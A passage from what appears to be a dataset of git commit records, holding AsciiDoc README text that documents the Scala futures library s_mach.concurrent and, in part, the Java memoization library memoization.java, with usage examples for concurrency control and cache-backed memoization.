println(\"Reading...\")\n oomItemIdBatch.workers(2).flatMap(_.workers(4).map(read))\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(10).toVector\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch.workers(2).flatMap(_.workers(4).map(item => write(item.id, item)))\n }\n } yield oomResult.forall(_ === true)\n}\n----\n\n\n=== Adding progress reporting, retry and throttle control to collection concurrent operations\n+s_mach.concurrent+ allows modifying collection concurrent operations (+serially+, +concurrently+ or +workers+) to\nreport progress, retry failures and limit iteration speed to a specific time period.\n\n.Example 4: Adding progress reporting, retry and throttle control to collection concurrent operations\n[source,scala,numbered]\n----\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch\n .serially\n .throttle(6.seconds)\n .flatMap { batch =>\n batch.\n .workers\n .progress(500.millis)(progress => println(progress))\n .retry {\n case _: TimeoutException :: tail if tail.size < 3 => true\n case _: SocketTimeoutException :: _ if tail.size < 3 => true\n case _ => false\n }\n .throttle(3.seconds)\n .map(read)\n }\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(10).toVector\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch.workers(2).flatMap(_.workers(4).map(item => write(item.id, item)))\n }\n } yield oomResult.forall(_ === true)\n}\n----\n\n=== Tuple Concurrently\nWhen first using +Future+ with a for-comprehension, it is natural to assume the following will produce concurrent\noperation:\n\n.Example 5: Incorrect +Future+ concurrency\n[source,scala,numbered]\n----\nfor {\n i1 <- read(\"1\")\n i2 <- read(\"2\")\n i3 <- read(\"3\")\n} yield (i1,i2,i3)\n----\n\nSadly, this code will compile and run just fine, but it will not execute concurrently. To correctly implement concurrent\noperation, the following standard pattern is used:\n\n.Example 6: Correct +Future+ concurrency:\n[source,scala,numbered]\n----\nval f1 = read(\"1\")\nval f2 = read(\"2\")\nval f3 = read(\"3\")\nval future = { \/\/ necessary for pasting into repl\n for {\n i1 <- f1\n i2 <- f2\n i3 <- f3\n } yield (i1,i2,i3)\n}\n----\n\nFor concurrent operation, all of the futures must be started before the for-comprehension. The for-comprehension is a\nmonadic workflow which captures commands that must take place in a specific sequential order. The pattern in example 2\nis necessary because Scala lacks an applicative workflow which captures commands that may be run in any order.\n+s_mach.concurrent+ adds the method +concurrently+ which is an applicative workflow specifically for futures. This\nmethod can more concisely express the pattern above:\n\n.Example 7: New +concurrently+ method\n[source,scala,numbered]\n----\nfor {\n (i1,i2,i3) <- concurrently(read(\"1\"), read(\"2\"), read(\"3\"))\n} yield (i1,i2,i3)\n----\n\nIn the example above, all futures are started at the same time and fed to the +concurrently+ method. The method returns\na +Future[(Int,Int,Int)]+ which completes once all supplied futures complete. After this returned Future completes, the\ntuple value results can be extracted using normal Scala idioms. The +concurrently+ method also fixes problems with\n+scala.concurrent+ exception handling (see the 'Under the hood: Merge' section below).\n\n=== Under the hood: +Merge+ method\nPowering both the tuple +concurrently+ method and the collection +.concurrently.map+, +.concurrently.flatMap+ and\n+.concurrently.foreach+ methods is the +merge+ and +flatMerge+ methods. The +merge+ method performs the same\nfunction as +Future.sequence+ (it calls +Future.sequence+ internally) but it ensures that the returned future completes\nimmediately after an exception occurs in any of the futures. Because +Future.sequence+ waits on all futures in left\nto right order before completing, an exception thrown at the beginning of the computation by a future at the\nfar right will not be detected until after all other futures have completed. For long running computations, this can\nmean a significant amount of wasted time waiting on futures to complete whose results will be discarded. Also, while\nthe scala parallel collections correctly handle multiple concurrent exceptions, +Future.sequence+ only returns the\nfirst exception encountered. In +Future.sequence+, all further exceptions past the first are discarded. The +merge+ and\n+flatMerge+ methods fix these problems by throwing +ConcurrentThrowable+. +ConcurrentThrowable+ has a member method to\naccess both the first exception thrown and a future of all exceptions thrown during the computation.\n\n.Example 8: +Future.sequence+ gets stuck waiting on longRead to complete and only returns the first exception:\n[source,scala,numbered]\n----\nscala> val t = Future.sequence(Vector(longRead(\"1\"),readFail(\"2\"),readFail(\"3\"),read(\"4\"))).getTry\n3\n4\n2\n1\nt: scala.util.Try[scala.collection.immutable.Vector[Item]] = Failure(java.lang.RuntimeException: 2)\n\nscala>\n----\n\n.Example 9: +merge+ method fails immediately on the first exception and throws +ConcurrentThrowable+, which can retrieve all exceptions:\n[source,scala,numbered]\n----\nscala> val t = Vector(longRead(\"1\"),readFail(\"2\"),readFail(\"3\"),read(\"4\")).merge.getTry\n2\nt: scala.util.Try[scala.collection.immutable.Vector[Item]] = Failure(ConcurrentThrowable(java.lang.RuntimeException: 2))\n3\n\nscala> 4\n1\n\nscala> val allFailures = t.failed.get.asInstanceOf[ConcurrentThrowable].allFailure.get\nallFailures: Vector[Throwable] = Vector(java.lang.RuntimeException: 2, java.lang.RuntimeException: 3)\n----\n","old_contents":"s_mach.concurrent: Futures utility library\n==========================================\nLance Gatlin <lance.gatlin@gmail.com>\nv1,13-Jul-2014\n:blogpost-status: unpublished\n:blogpost-categories: s_mach, scala\n\n*UNDER CONSTRUCTION*\n\nimage:https:\/\/travis-ci.org\/S-Mach\/s_mach.concurrent.svg[Build Status, link=\"https:\/\/travis-ci.org\/S-Mach\/s_mach.concurrent\"] image:https:\/\/coveralls.io\/repos\/S-Mach\/s_mach.concurrent\/badge.png[Test Coverage,link=\"https:\/\/coveralls.io\/r\/S-Mach\/s_mach.concurrent\"] https:\/\/github.com\/S-Mach\/s_mach.concurrent[Code] http:\/\/S-Mach.github.io\/s_mach.concurrent[Scaladoc]\n\n+s_mach.concurrent+ is an open-source Scala library that provides concurrent execution flow control primitives for\nworking with the scala.concurrent standard library.\n\n* Adds new flow control primitives +concurrently+, +serially+ and +workers+ for control of collection concurrent operations\n* Adds progress reporting, retry and throttle control for collection concurrent operations\n* Adds +ScheduledExecutionContext+, a wrapper for +java.util.concurrent.ScheduledExecutorService+ that provides a functional style interface for scheduling delayed and periodic tasks\n* Adds non-blocking concurrent control primitives such as +Barrier+, +Latch+, +Lock+, +Semaphore+ and +Queue+\n* Overcomes some design limitations of the scala.concurrent library\n* Provides convenience methods for writing more readable, concise and DRY concurrent code such as +Future.get+, +Future.toTry+ and +Future.fold+\n\n== Include in SBT\n1. +s_mach.concurrent+ is currently compatible with only Scala 2.11 (but there are plans to add 2.10.4 support)\n2. Add to +build.sbt+ OR +~\/.sbt\/{verison}\/build.sbt+\n+\n[source,sbt,numbered]\n----\nresolvers += Resolver.sonatypeRepo(\"snapshots\")\n----\n+\n3. Add to +build.sbt+\n+\n[source,sbt,numbered]\n----\nlibraryDependencies += \"net.s_mach\" %% \"concurrent\" % \"0.1-SNAPSHOT\"\n----\n\n\n== Imports for Examples\nAll code examples assume the following imports:\n[source,scala,numbered]\n----\nimport scala.util._\nimport scala.concurrent._\nimport scala.concurrent.ExecutionContext.Implicits.global\nimport scala.concurrent.duration._\nimport s_mach.concurrent._\nimport s_mach.concurrent.util._\n\ncase class Item(id: String, value: Int, relatedItemId: String)\ndef read(id: String) : Future[Item] = Future { Thread.sleep(1000); println(id); Item(id,id.toInt,(id.toInt+1).toString) }\ndef readFail(id: String) : Future[Item] = Future { Thread.sleep(1000); println(id); throw new RuntimeException(id.toString) }\ndef longRead(id: String) : Future[Item] = Future { Thread.sleep(2000); println(id); Item(id,id.toInt,(id.toInt+1).toString) }\ndef write(id: String, item: Item) : Future[Boolean] = Future { Thread.sleep(1000); println(id); true }\ndef writeFail(id: String, item: Item) : Future[Boolean] = Future { Thread.sleep(1000); println(id); throw new RuntimeException(id.toString) }\n----\n\n== Transforming and traversing collections serially and concurrently\nA common task when working with futures is either transforming or traversing a collection that will call a method that\nreturns a future. The standard idiom for performing this task only provides methods for concurrent operation and, with\nenough nesting, leads to difficult to read code:\n\n.Example 1: Transform and traverse collections, standard method\n[source,scala,numbered]\n----\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch\n \/\/ Serially perform read of each batch\n .foldLeft(Future.successful(List[Item]())) { (facc, idBatch) =>\n for {\n acc <- facc\n \/\/ Concurrently read batch\n oomItem <- Future.sequence(idBatch.map(read))\n } yield acc ::: oomItem\n }\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(2).toList\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch\n \/\/ Serially perform write of each batch\n .foldLeft(Future.successful(List[Boolean]())) { (facc, itemBatch) =>\n for {\n acc <- facc\n \/\/ Concurrently write batch\n oomResult <- Future.sequence(itemBatch.map(item => write(item.id, item)))\n } yield acc ::: oomResult\n }\n }\n } yield oomResult.forall(_ == true)\n}\n----\n\nThe same code, rewritten using +s_mach.concurrent+:\n\n.Example 2: Using +s_mach.concurrent+ to serially or concurrently transform and traverse collections:\n[source,scala,numbered]\n----\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch.serially.flatMap(_.concurrently.map(read))\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(10).toVector\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch.serially.flatMap(_.concurrently.map(item => write(item.id, item)))\n }\n } yield oomResult.forall(_ == true)\n}\n----\n\n== Transforming and traversing collections using workers\n\n+s_mach.concurrent+ provides the +workers+ method which allows specifying the maximum number of concurrent operations.\n\n.Example 3: Using +s_mach.concurrent+ workers to transform and traverse collections:\n[source,scala,numbered]\n----\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch.workers(2).flatMap(_.workers(4).map(read))\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(10).toVector\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch.workers(2).flatMap(_.workers(4).map(item => write(item.id, item)))\n }\n } yield oomResult.forall(_ == true)\n}\n----\n\n\n== Adding progress reporting, retry and throttle control to collection concurrent operations\n+s_mach.concurrent+ allows modifying collection concurrent operations (+serially+, +concurrently+ or +workers+) to\nreport progress, retry failures and limit iteration speed to a specific time period.\n\n.Example 4: Adding progress reporting, retry and throttle control to collection concurrent operations\n[source,scala,numbered]\n----\nval oomItemIdBatch = (1 to 10).toList.map(_.toString).grouped(2).toList\nval future = { \/\/ necessary for pasting into repl\n for {\n oomItem <- {\n println(\"Reading...\")\n oomItemIdBatch\n .serially\n .throttle(6.seconds)\n .flatMap { batch =>\n batch.\n .workers\n .progress(500.millis)(progress => println(progress))\n .retry {\n case _: TimeoutException :: tail if tail.size < 3 => true\n case _: SocketTimeoutException :: _ if tail.size < 3 => true\n case _ => false\n }\n .throttle(3.seconds)\n .map(read)\n }\n }\n _ = println(\"Computing...\")\n oomNewItemBatch = oomItem.map(item => item.copy(value = item.value + 1)).grouped(10).toVector\n oomResult <- {\n println(\"Writing...\")\n oomNewItemBatch.workers(2).flatMap(_.workers(4).map(item => write(item.id, item)))\n }\n } yield oomResult.forall(_ == true)\n}\n----\n\n== Tuple Concurrently\nWhen first using +Future+ with a for-comprehension, it is natural to assume the following will produce concurrent\noperation:\n\n.Example 5: Incorrect +Future+ concurrency\n[source,scala,numbered]\n----\nfor {\n i1 <- read(\"1\")\n i2 <- read(\"2\")\n i3 <- read(\"3\")\n} yield (i1,i2,i3)\n----\n\nSadly, this code will compile and run just fine, but it will not execute concurrently. To correctly implement concurrent\noperation, the following standard pattern is used:\n\n.Example 6: Correct +Future+ concurrency:\n[source,scala,numbered]\n----\nval f1 = read(\"1\")\nval f2 = read(\"2\")\nval f3 = read(\"3\")\nval future = { \/\/ necessary for pasting into repl\n for {\n i1 <- f1\n i2 <- f2\n i3 <- f3\n } yield (i1,i2,i3)\n}\n----\n\nFor concurrent operation, all of the futures must be started before the for-comprehension. The for-comprehension is a\nmonadic workflow which captures commands that must take place in a specific sequential order. The pattern in example 2\nis necessary because Scala lacks an applicative workflow which captures commands that may be run in any order.\n+s_mach.concurrent+ adds the method +concurrently+ which is an applicative workflow specifically for futures. This\nmethod can more concisely express the pattern above:\n\n.Example 7: New +concurrently+ method\n[source,scala,numbered]\n----\nfor {\n (i1,i2,i3) <- concurrently(read(\"1\"), read(\"2\"), read(\"3\"))\n} yield (i1,i2,i3)\n----\n\nIn the example above, all futures are started at the same time and fed to the +concurrently+ method. The method returns\na +Future[(Int,Int,Int)]+ which completes once all supplied futures complete. After this returned Future completes, the\ntuple value results can be extracted using normal Scala idioms. The +concurrently+ method also fixes problems with\n+scala.concurrent+ exception handling (see the 'Under the hood: Merge' section below).\n\n== Under the hood: +Merge+ method\nPowering both the tuple +concurrently+ method and the collection +.concurrently.map+, +.concurrently.flatMap+ and\n+.concurrently.foreach+ methods is the +merge+ and +flatMerge+ methods. The +merge+ method performs the same\nfunction as +Future.sequence+ (it calls +Future.sequence+ internally) but it ensures that the returned future completes\nimmediately after an exception occurs in any of the futures. Because +Future.sequence+ waits on all futures in left\nto right order before completing, an exception thrown at the beginning of the computation by a future at the\nfar right will not be detected until after all other futures have completed. For long running computations, this can\nmean a significant amount of wasted time waiting on futures to complete whose results will be discarded. Also, while\nthe scala parallel collections correctly handle multiple concurrent exceptions, +Future.sequence+ only returns the\nfirst exception encountered. In +Future.sequence+, all further exceptions past the first are discarded. The +merge+ and\n+flatMerge+ methods fix these problems by throwing +ConcurrentThrowable+. +ConcurrentThrowable+ has a member method to\naccess both the first exception thrown and a future of all exceptions thrown during the computation.\n\n.Example 8: +Future.sequence+ gets stuck waiting on longRead to complete and only returns the first exception:\n[source,scala,numbered]\n----\nscala> val t = Future.sequence(Vector(longRead(\"1\"),readFail(\"2\"),readFail(\"3\"),read(\"4\"))).getTry\n3\n4\n2\n1\nt: scala.util.Try[scala.collection.immutable.Vector[Item]] = Failure(java.lang.RuntimeException: 2)\n\nscala>\n----\n\n.Example 9: +merge+ method fails immediately on the first exception and throws +ConcurrentThrowable+, which can retrieve all exceptions:\n[source,scala,numbered]\n----\nscala> val t = Vector(longRead(\"1\"),readFail(\"2\"),readFail(\"3\"),read(\"4\")).merge.getTry\n2\nt: scala.util.Try[scala.collection.immutable.Vector[Item]] = Failure(ConcurrentThrowable(java.lang.RuntimeException: 2))\n3\n\nscala> 4\n1\n\nscala> val allFailures = t.failed.get.asInstanceOf[ConcurrentThrowable].allFailure.get\nallFailures: Vector[Throwable] = Vector(java.lang.RuntimeException: 2, java.lang.RuntimeException: 3)\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f61eefb0fcf83933a361b1e7d6b7008152e20005","subject":"fix #197 - mention triava as JCache implementation","message":"fix #197 - mention triava as JCache implementation\n\nSigned-off-by: Sebastian Ho\u00df <1d6e1cf70ec6f9ab28d3ea4b27a49a77654d370e@shoss.de>","repos":"sebhoss\/memoization.java","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"= memoization.java image:https:\/\/img.shields.io\/badge\/email-%40metio-brightgreen.svg?style=social&label=mail[\"Discuss on Google Groups\", link=\"https:\/\/groups.google.com\/forum\/#!forum\/metio\"] image:https:\/\/img.shields.io\/badge\/irc-%23metio.wtf-brightgreen.svg?style=social&label=IRC[\"Chat on IRC\", link=\"http:\/\/webchat.freenode.net\/?channels=metio.wtf\"]\nSebastian Ho\u00df <http:\/\/seb.xn--ho-hia.de\/[@sebhoss]>\n:github-org: sebhoss\n:project-name: memoization.java\n:project-group: de.xn--ho-hia.memoization\n:coverity-project: 8732\n:codacy-project: 0ed810b7f2514f0ea1c8e86e97c803c4\n:jdk-api: https:\/\/docs.oracle.com\/javase\/8\/docs\/api\n:issue: https:\/\/github.com\/sebhoss\/memoization.java\/issues\n:toc:\n:toc-placement: preamble\n\nimage:https:\/\/img.shields.io\/badge\/license-cc%20zero-000000.svg?style=flat-square[\"CC Zero\", link=\"http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/\"]\npass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/maven-badges.herokuapp.com\/maven-central\/de.xn--ho-hia.memoization\/memoization.java\"><img src=\"https:\/\/img.shields.io\/maven-central\/v\/de.xn--ho-hia.memoization\/memoization.java.svg?style=flat-square\" alt=\"Maven Central\"><\/a><\/span>]\nimage:https:\/\/reposs.herokuapp.com\/?path={github-org}\/{project-name}&style=flat-square[\"Repository size\"]\nimage:https:\/\/www.openhub.net\/p\/memoization-java\/widgets\/project_thin_badge?format=gif[\"Open Hub statistics\", link=\"https:\/\/www.openhub.net\/p\/memoization-java\"]\n\nimage:https:\/\/img.shields.io\/travis\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Build Status\", link=\"https:\/\/travis-ci.org\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coveralls\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Code Coverage\", link=\"https:\/\/coveralls.io\/github\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coverity\/scan\/{coverity-project}.svg?style=flat-square[\"Coverity Scan Result\", link=\"https:\/\/scan.coverity.com\/projects\/{github-org}-memoization-java\"]\nimage:https:\/\/img.shields.io\/codacy\/grade\/{codacy-project}.svg?style=flat-square[\"Codacy Code Quality\", link=\"https:\/\/www.codacy.com\/app\/mail_7\/memoization-java\"]\nimage:https:\/\/img.shields.io\/badge\/forkable-yes-brightgreen.svg?style=flat-square[\"Can this project be forked?\", link=\"https:\/\/basicallydan.github.io\/forkability\/?u={github-org}&r={project-name}\"]\nimage:https:\/\/img.shields.io\/maintenance\/yes\/2017.svg?style=flat-square[\"Is this thing still maintained?\"]\nimage:https:\/\/img.shields.io\/bountysource\/team\/metio\/activity.svg?style=flat-square[\"Bounties on open tickets\", link=\"https:\/\/www.bountysource.com\/teams\/metio\"]\n\n_Java link:https:\/\/en.wikipedia.org\/wiki\/Memoization[memoization] library - trade space for time_\n\n== Features\n\n* Memoize calls to `Consumer`, `Function`, `Predicate`, `Supplier` and other functional interfaces in `java.util.function`\n* Cache values using link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine], link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava], link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] or any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`]\n* Customize cache key calculation\n\n.Coverage of `java.util.function`\n|===\n| | Caffeine | Guava | JCache | ConcurrentMap\n\n| link:{jdk-api}\/java\/util\/function\/BiConsumer.html[BiConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiFunction.html[BiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiPredicate.html[BiPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BooleanSupplier.html[BooleanSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Consumer.html[Consumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleBinaryOperator.html[DoubleBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleConsumer.html[DoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleFunction.html[DoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoublePredicate.html[DoublePredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleSupplier.html[DoubleSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToIntFunction.html[DoubleToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToLongFunction.html[DoubleToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleUnaryOperator.html[DoubleUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Function.html[Function]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntBinaryOperator.html[IntBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntConsumer.html[IntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntFunction.html[IntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntPredicate.html[IntPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntSupplier.html[IntSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToDoubleFunction.html[IntToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToLongFunction.html[IntToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntUnaryOperator.html[IntUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongBinaryOperator.html[LongBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongConsumer.html[LongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongFunction.html[LongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongPredicate.html[LongPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongSupplier.html[LongSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToDoubleFunction.html[LongToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToIntFunction.html[LongToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongUnaryOperator.html[LongUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjDoubleConsumer.html[ObjDoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjIntConsumer.html[ObjIntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjLongConsumer.html[ObjLongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Predicate.html[Predicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Supplier.html[Supplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleBiFunction.html[ToDoubleBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleFunction.html[ToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntBiFunction.html[ToIntBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntFunction.html[ToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongBiFunction.html[ToLongBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongFunction.html[ToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n|===\n\n\n== Development Status\n\nThe Caffeine, Guava, JCache and `ConcurrentMap` based implementations cover all functional interfaces from `java.util.function`. Take a look at the link:https:\/\/github.com\/sebhoss\/memoization.java\/issues[open tickets] for future ideas & ways to help out.\n\n== Usage\n\nMemoize any of the supported types by using the static factory methods supplied by:\n\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-caffeine\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-caffeine.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `CaffeineMemoize` if you want to use link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-guava\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-guava.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `GuavaMemoize` if you want to use link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-jcache\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-jcache.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `JCacheMemoize` if you want to use link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] (JSR107) caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-core\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-core.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `MapMemoize` if you want to use any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`] as cache.\n\n=== Default cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier);\n----\n\n=== Default cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier);\n----\n\n=== Custom cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nCache<INPUT, INPUT> cache = ...; \/\/ com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nCache<INPUT, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nCache<INPUT, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nMap<String, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, cache);\n----\n\n=== Custom cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, INPUT> cache = ...; \/\/ com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, 